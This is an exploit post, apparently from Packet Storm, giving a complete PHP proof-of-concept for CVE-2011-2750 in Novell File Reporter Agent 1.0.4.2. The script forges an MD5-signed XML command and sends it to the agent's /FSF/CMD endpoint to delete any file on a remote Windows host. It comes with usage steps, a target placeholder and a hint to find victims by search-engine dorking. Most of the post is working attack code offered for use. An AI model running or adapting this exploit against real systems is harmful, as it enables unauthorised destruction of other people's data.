Share
## https://sploitus.com/exploit?id=PACKETSTORM:215169
=============================================================================================================================================
    | # Title     : NFR Agent 1.0.4.2 Arbitrary File Delete Vulnerability                                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.opentext.com/products/listing?o=mf                                                                              |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: The code exploits a vulnerability in the Novell File Reporter Agent, which allows an attacker to remotely delete any file on the targeted system. It affects version 1.0.4.2 and below.
       
       (Related : https://packetstorm.news/files/id/180891/ Linked CVE numbers: CVE-2011-2750 ) .
    	
    [+] save code as poc.php.
    
    [+] Set taget : Line 57.
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class NovellFileReporterExploit {
        private $target;
        private $port;
        private $ssl;
        private $filePath;
    
        public function __construct($target, $port = 3037, $ssl = true, $filePath = 'C:\\test.txt') {
            $this->target = $target;
            $this->port = $port;
            $this->ssl = $ssl;
            $this->filePath = $filePath;
        }
    
        private function md5Upper($data) {
            return strtoupper(md5($data));
        }
    
        public function deleteFile() {
            $protocol = $this->ssl ? 'https' : 'http';
            $url = "$protocol://{$this->target}:{$this->port}/FSF/CMD";
    
            $record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>5</CMD><PATH>{$this->filePath}</PATH></RECORD>";
            $md5Hash = $this->md5Upper('SRS' . $record . 'SERVER');
            $message = $md5Hash . $record;
    
            $response = $this->sendPostRequest($url, $message);
    
            if ($response && strpos($response, '<STATUS>0</STATUS>') !== false) {
                echo "[+] File {$this->filePath} successfully deleted\n";
            } else {
                echo "[-] File not deleted\n";
            }
        }
    
        private function sendPostRequest($url, $data) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: text/xml"]);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            
            if ($this->ssl) {
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    }
    
    // ุงุณุชุฎุฏุงู… ุงู„ูƒูˆุฏ
    $exploit = new NovellFileReporterExploit('target_ip_here');
    $exploit->deleteFile();
    
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================